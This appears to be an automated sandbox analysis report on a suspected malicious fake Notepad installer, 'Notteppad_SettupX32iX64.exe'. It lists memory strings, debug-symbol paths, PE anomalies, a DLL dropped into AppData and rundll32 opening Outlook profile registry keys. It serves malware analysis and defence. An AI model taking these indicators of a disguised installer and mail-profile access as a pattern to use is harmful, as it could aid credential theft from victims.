yo-NGquz-BOnso-ZAba-RUlb-LUkl-GLig-NGkr-NGsah-RUquc-Latn-GTrw-RWwo-SNprs-AFgd-GBku-Arab-IQqps-plocarn-CLmoh-CAbr-FRug-CNmi-NZoc-FRco-FRgsw-FRit-CHnl-BEnn-NOpt-PTro-MDru-MDsv-FIur-INqps-plocaar-IQca-ES-valenciazh-CNde-CHen-GBes-MXfr-BEpa-Arab-PKta-LKmn-Mong-CNsd-Arab-PKtzm-Latn-DZks-Deva-INne-INff-Latn-SNaz-Cyrl-AZdsb-DEtn-BWse-SEga-IEms-BNuz-Cyrl-UZbn-BDes-ESfr-CAse-FImn-Mong-MNdz-BTquz-PEar-LYzh-SGquz-ECti-ERqps-Latn-x-shqps-plocmar-EGzh-HKde-ATen-AUzh-MOde-LIen-NZes-CRfr-LUsmj-SEar-MAen-IEde-LUen-CAes-GTfr-CHhr-BAsmj-NOtzm-Tfng-MAar-DZar-OMen-JMes-VEfr-REsms-FIar-YEen-029es-COes-PAfr-MCsma-NOar-TNen-ZAes-DOfr-029sma-SEar-JOen-TTes-ARfr-CMsr-Latn-MEar-LBen-ZWes-ECfr-CDsr-Latn-RSsmn-FIar-SYen-BZes-PEfr-SNsr-Cyrl-RSes-UYfr-MAar-BHen-HKes-PYfr-HTar-QAen-INfr-CIsr-Cyrl-MEar-KWen-PHes-CLfr-MLar-AEen-IDes-419es-CUbs-Cyrlbs-Latnsr-Cyrlsr-Latnsmnaz-Cyrles-BOen-MYes-SVen-SGes-HNes-NIes-PRes-USiu-Canstzm-Tfngnbsrtg-Cyrldsbsmjuz-Latnsmszhnnbsaz-Latnsmauz-Cyrlmn-Cyrlquc-Lat
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.260789377.0000000002833000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.262323104.0000000002E00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: .xlsmMicrosoft.Office.Desktop_8wekyb3d8bbwe!Excel.dot.dotx.docmMicrosoft.Office.Desktop_8wekyb3d8bbwe!WordMicrosoft.Office.Desktop_8wekyb3d8bbwe!PowerPoint.ods.xla.xlam.xlt.xltm.xltx.xlsb.pps.ppsm.ppsx.thmx.pot.potm.potx.pptmms-powerpointms-excelms-word.odp.ppa.ppamABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/Explorer.AssocActionId.CloseSessionExplorer.AssocActionId.EraseDiscExplorer.AssocActionId.ZipSelectionExplorer.AssocProtocol.search-msExplorer.BurnSelectionExplorer.CloseSessionExplorer.EraseDiscExplorer.ZipSelectionAppExplorer.AssocActionId.BurnSelectionStickyNotestelnettn3270VbscriptwindowsmediacenterappwindowsmediacentersslwindowsmediacenterwebWMP11.AssocProtocol.MMSFileIehistoryIerssJavascriptJscriptLDAPResrlogin.cpf.crd.crds.crt.csh.fxp.gadget.grp.ade.adp.app.application.appref-ms.asp.bas.cnt.ksh.mad.maf.mag.mam.maq.mar.mas.hlp.hme.hpj.hta.ins.isp.its.jse.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mat.mau.mav.maw.mcf.mda.mde.mdt.printerexport.provxml.ps2.ps2xml.psc2.py.pyc.pyo.mshxml.mst.ops.pcd.pl.plg.prf.prg.shb.shs.theme.tsk.vb.vbe.vbp.vsmacros.pvw.plsc.rb.rbw.rdp.rgu.scf.scr.xnk.vsw.webpnp.ws.wsc.wsh.xaml.xdp.xipKOTWCNFRBRITNLSVENDEJAPTTRSKSLARHEEUISDAFIHUNOELPLRUCSiu-Latn-CAiu-CA-Latnbs-Cyrl-BAbs-BA-Cyrlbs-Latn-BAbs-BA-Latnzh-Hantzh-CHTsr-Latn-CSsr-SP-Latnsr-Cyrl-CSsr-SP-Cyrlsr-Latn-BAsr-BA-Latnsr-Cyrl-BAsr-BA-Cyrlzh-Hanszh-CHSarbgcacsdadeitjakonlplptrmroelenesfifrhehuisukbesletlvlttgfaruhrsksqsvthtrurtnvexhzuafkafohivihyazeuhsbmksttstkuzttbnpaguortamtsegayimskkkyswcykmlomyglkokmnisdteknmlasmrsamnbofypsfildvbinffhaibbsyrsichriuamtzmksneomtignhawlasoiipapyoquznsobalbkligkrsahqucrwwoprsgdkuar-SAarnmohbrugmioccogswes-ES_tradnlfi-FIfr-FRhe-ILhu-HUis-ISit-ITja-JPbg-BGca-ESzh-TWcs-CZda-DKde-DEel-GRen-UShr-HRsk-SKsq-ALsv-SEth-THtr-TRur-PKid-IDko-KRnl-NLnb-NOpl-PLpt-BRrm-CHro-ROru-RUvi-VNhy-AMaz-Latn-AZeu-EShsb-DEmk-MKst-ZAts-ZAuk-UAbe-BYsl-SIet-EElv-LVlt-LTtg-Cyrl-TJfa-IRmt-MTse-NOyi-001ms-MYkk-KZky-KGsw-KEtk-TMtn-ZAve-ZAxh-ZAzu-ZAaf-ZAka-GEfo-FOhi-INkn-INml-INas-INmr-INsa-INmn-MNbo-CNcy-GBuz-Latn-UZtt-RUbn-INpa-INgu-INor-INta-INte-INsi-LKchr-Cher-USiu-Cans-CAam-ETtzm-Arab-MAks-Arabne-NPfy-NLkm-KHlo-LAmy-MMgl-ESkok-INmni-INsd-Deva-INsyr-SYquz-BOnso-ZAba-RUlb-LUkl-GLig-NGkr-NGom-ETps-AFfil-PHdv-MVbin-NGff-NGha-Latn-NGibb-NGyo-NGmoh-CAbr-FRug-CNmi-NZoc-FRco-FRgsw-FRsah-RUti-ETgn-PYhaw-USla-001so-SOii-CNpap-029arn-CLar-IQca-ES-valenciazh-CNde-CHen-GBes-MXfr-BEit-CHquc-Latn-GTrw-RWwo-SNprs-AFgd-GBku-Arab-IQqps-plocqps-plocadsb-DEtn-BWse-SEga-IEms-BNuz-Cyrl-UZbn-BDpa-Arab-PKnl-BEnn-NOpt-PTro-MDru-MDsv-FIur-INaz-Cyrl-AZti-ERqps-Latn-x-shqps-plocmar-EGzh-HKde-ATen-AUes-ESta-LKmn-Mong-CNsd-Arab-PKtzm-Latn-DZks-Deva-INne-INff-Latn-SNquz-ECen-CAes-GTfr-CHhr-BAsmj-NOtzm-Tfng-MAar-DZzh-MOfr-CAse-FImn-Mong-MNdz-BTquz-PEar-LYzh-SGde-LUfr-MCsma-NOar-TNen-ZAes-DOfr-029sma-SEar-OMde-LIen-NZes-CRfr-LUsmj-SEar-MAen-IEes-PAsr-Latn-RSsmn-FIar-SYen-BZes-PEfr-SNsr-Cyrl-RSar-JOen-JMes-VEfr-REsms-FIar-YEen-029es-COfr-CDsr-Cyrl-MEar-KWen-PHes-CLf
              Source: rundll32.exeString found in binary or memory: ./?.so;lua/lib/amd64/?.so;lua/lib/amd64/loadall.so
              Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\OutlookJump to behavior
              Source: Binary string: wkernel32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.244881244.0000000002620000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.244831412.0000000002504000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.248576597.0000000002830000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.248145801.000000000250C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcrt.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245563996.00000000025D0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.245469036.000000000250D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wrpcrt4.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245765521.0000000002501000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.245844802.00000000025D0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000002.273050542.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.244109715.0000000002507000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: shcore.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.260362834.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.259962474.0000000002508000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.280113547.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wwin32u.pdbGCTL source: Notteppad_SettupX32iX64.exe, 00000000.00000003.249955394.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: bcryptprimitives.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245986343.00000000035F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: setupapi.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253433753.000000000283D000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.254291672.0000000002C80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wgdi32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.246070776.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: advapi32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245334588.00000000035F9000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.245378880.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: fltLib.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263974980.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wsspicli.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245915259.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cfgmgr32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.255043550.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.289392390.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: shell32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.257766022.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.255570037.00000000036E3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wrpcrt4.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245765521.0000000002501000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.245844802.00000000025D0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msvcp_win.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.247163570.00000000035F9000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.247436363.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: psapi.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253383026.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.284854081.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wgdi32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.246070776.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wkernelbase.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.244960679.0000000002835000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.245144448.0000000002A20000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wimm32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.251663261.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mpr.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.255267191.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wwin32u.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.249955394.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wsspicli.pdbGCTL source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245915259.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: setupapi.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253433753.000000000283D000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.254291672.0000000002C80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: combase.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.250112415.000000000283E000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.250519069.0000000002AA0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: gdi32full.pdb source: rundll32.exe, 00000001.00000003.280972629.0000025AA3B65000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.282135570.0000025AA3CFD000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: win32u.pdb source: rundll32.exe, 00000001.00000003.280859396.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.248576597.0000000002830000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.248145801.000000000250C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wkernelbase.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.244960679.0000000002835000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.245144448.0000000002A20000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cryptbase.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245960559.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wuser32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.248888902.000000000250B000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.249465359.0000000002830000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: shell32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.257766022.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.255570037.00000000036E3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wimm32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.251663261.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: fltLib.pdbGCTL source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263974980.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: imm32.pdb source: rundll32.exe, 00000001.00000003.283179571.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: gdi32full.pdbUGP source: rundll32.exe, 00000001.00000003.280972629.0000025AA3B65000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.282135570.0000025AA3CFD000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wgdi32full.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.246455497.00000000028AC000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.246110906.0000000002585000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: profapi.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263650614.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.293014153.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ws2_32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253309097.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.253224746.00000000035F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msctf.pdbUGP source: rundll32.exe, 00000001.00000003.283688801.0000025AA3B90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wgdi32full.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.246455497.00000000028AC000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.246110906.0000000002585000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: shcore.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.260362834.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.259962474.0000000002508000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.280113547.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mpr.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.255267191.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: XAMLHostHwndvolumelabelmasteredudfhelpJOLIETUDFData\Program Files\$Windows.~BT\Windows\ProgramData\Program Files (x86)\Program Files\Data\Windows\Data\ProgramData\Data\Program Files (x86)\.cer.cdxml.cat.automaticdestinations-ms.appxpackage.appxbundle.appxWindows.old\.fon.etl.efi.dsft.dmp.customdestinations-ms.cookie.msm.msip.mpb.mp.p12.p10.otf.ost.olb.ocx.nst.mui.pdb.partial.p7x.p7s.p7r.p7m.p7c.p7b.psf.psd1.pfx.pfm.pem.ttc.sys.sst.spkg.spc.sft.rll.winmd.wim.wfs.vsix.vsi.vmrs.vmcxWININET.xap%s (%d).%s\shellIfExecBrowserFlagsft%06dNeverShowExtAlwaysShowExtTopicL source: Notteppad_SettupX32iX64.exe, 00000000.00000003.257766022.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.255570037.00000000036E3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000002.273050542.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.244109715.0000000002507000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000001.00000003.269181411.0000025AA3900000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ole32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.251971029.0000000002503000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.252817024.0000000002830000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.293112471.0000025AA3A1B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: powrprof.pdbUGP source: rundll32.exe, 00000001.00000003.293051816.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: powrprof.pdb source: rundll32.exe, 00000001.00000003.293051816.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msctf.pdb source: rundll32.exe, 00000001.00000003.283688801.0000025AA3B90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wmswsock.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.264610622.00000000035F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Windows.Storage.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.260789377.0000000002833000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.262323104.0000000002E00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ole32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.251971029.0000000002503000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.252817024.0000000002830000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.293112471.0000025AA3A1B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: win32u.pdbGCTL source: rundll32.exe, 00000001.00000003.280859396.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Kernel.Appcore.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263476814.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.292944490.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wkernel32.pdbGCTL source: Notteppad_SettupX32iX64.exe, 00000000.00000003.244881244.0000000002620000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.244831412.0000000002504000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: imm32.pdbUGP source: rundll32.exe, 00000001.00000003.283179571.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: kernelbase.pdbUGP source: rundll32.exe, 00000001.00000003.269724498.0000025AA3818000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Kernel.Appcore.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263476814.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.292944490.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: psapi.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253383026.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.284854081.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msvcp_win.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.247163570.00000000035F9000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.247436363.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: advapi32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245334588.00000000035F9000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.245378880.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cryptbase.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245960559.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cfgmgr32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.255043550.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.289392390.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: oleaut32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253075899.0000000002508000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.253137591.00000000025A0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: bcryptprimitives.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245986343.00000000035F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: combase.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.250112415.000000000283E000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.250519069.0000000002AA0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Windows.Storage.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.260789377.0000000002833000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.262323104.0000000002E00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdb source: rundll32.exe, 00000001.00000003.269181411.0000025AA3900000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ApplicationFrameWindowWindows.Foundation.Collections.IIterator`1<IUnknown>Windows.Foundation.Collections.IVectorView`1<IUnknown>Windows.Foundation.Collections.IVector`1<IUnknown>@%SystemRoot%\System32\SettingSyncCore.dll,-1024internal\onecoreuapshell\private\inc\shouldswitchtodesktop.hinternal\onecoreuapshell\private\inc\sharedstoragesources\syncrootcommon.hData\Program Files\Data\Program Files (x86)\Data\ProgramData\Data\Windows\Program Files\Program Files (x86)\ProgramData\Windows\$Windows.~BT\Windows.old\.appx.appxbundle.appxpackage.automaticdestinations-ms.cat.cdxml.cer.cookie.customdestinations-ms.dmp.dsft.efi.etl.fon.ini.iso.mp.mpb.msip.msm.mui.nst.ocx.olb.ost.otf.p10.p12.p7b.p7c.p7m.p7r.p7s.p7x.partial.pdb.pem.pfm.pfx.psd1.psf.rll.sft.spc.spkg.sst.ttc.ttf.vmcx.vmrs.vsi.vsix.wfs.wim.winmd.xapFTSearched0000000000000000000BasicPropertiesDocumentPropertiesImagePropertiesVideoPropertiesMusicPropertiesRenameAsyncOverloadDefaultOptionsRenameAsyncIStorageItem2GetParentAsyncIsEqualGetThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetThumbnailAsyncOverloadDefaultOptionsget_DisplayNameIStorageItemProperties2GetScaledImageAsThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetScaledImageAsThumbnailAsyncOverloadDefaultOptionsGetScaledImageAsThumbnailAsyncIStorageItemPropertiesWithProviderget_ProviderIStorageItemThumbnailAccessPrivGetScaledImageOrThumbnailAsyncIStorageItemHandleAcccessOpenAsyncPrivatePauseDeferredUpdateSetStreamedFileCallbackGetStreamedFileCallbackGetSpecialInternalPropertySetSpecialInternalPropertyCreateTempFileInSameLocationCopyOverloadDefaultOptionsCopyOverloadCopyAndReplaceAsyncMoveOverloadDefaultNameAndOptionsWindows.Security.EnterpriseData.FileProtectionManagerMoveOverloadDefaultOptionsoptionsCreateFolderAsyncOverloadDefaultOptionsGetItemAsyncGetItemsAsyncOverloadDefaultStartAndCountCreateFileQueryOverloadDefaultCreateFileQueryCreateFolderQueryOverloadDefaultCreateFolderQueryCreateFolderQueryWithOptionsCreateItemQueryWithOptionsGetFilesAsyncOverloadDefaultStartAndCountGetFoldersAsyncOverloadDefaultStartAndCountget_MusicLibraryget_HomeGroupget_RemovableDevicesget_MediaServerDevicesget_Playlistsget_SavedPicturesget_Objects3Dget_AppCapturesget_RecordedCallsGetFolderForUserAsyncget_ApplicationDataSharedLocalGetPublisherCacheFolderGetApplicationDataFolderForUserGetPublisherCacheFolderForUserknownfolder:{AB5FB87B-7CE2-4F83-915D-550846C9537B}knownfolder:{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}knownfolder:{1C2AC1DC-4358-4B6C-9733-AF21156576F0}knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}knownfolder:{374DE290-123F-4565-9164-39C4925E467B}knownfolder:{bfb9d5e0-c6a9-404c-b2b2-ae6db6af4968}knownfolder:{4BD8D571-6D19-48D3-BE97-422220080E43}knownfolder:{33E28130-4E1E-4676-835A-98395C3BC3BB}knownfolder:{AE50C081-EBD2-438A-8655-8A092E34987A}knownfolder:{C870044B-F49E-4126-A9C3-B52A1FF411E8}knownfolder:{3B193882-D3AD-4eab-965A-69829D1FB59F}knownfolder:{f3ce0f7c-4901-4acc-8648-d5d44b04ef8f}knownfolder:{18989B1D-99B5-455B-841C-AB7C74E4DDFC}get_Langua
              Source: Binary string: profapi.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263650614.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.293014153.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wmswsock.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.264610622.00000000035F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: oleaut32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253075899.0000000002508000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.253137591.00000000025A0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wuser32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.248888902.000000000250B000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.249465359.0000000002830000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ws2_32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253309097.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.253224746.00000000035F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: kernelbase.pdb source: rundll32.exe, 00000001.00000003.269724498.0000025AA3818000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007FFC28901244 push rbx; retf 1_2_00007FFC28901246
              Source: Notteppad_SettupX32iX64.exeStatic PE information: section name: /4
              Source: nsis_uns6283e8.dll.0.drStatic PE information: section name: .xdata
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006EC7A0 GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,0_2_006EC7A0
              Source: Notteppad_SettupX32iX64.exeStatic PE information: real checksum: 0x4a1c0 should be: 0x529b6
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeFile created: C:\Users\user\AppData\Roaming\nsis_uns6283e8.dllJump to dropped file
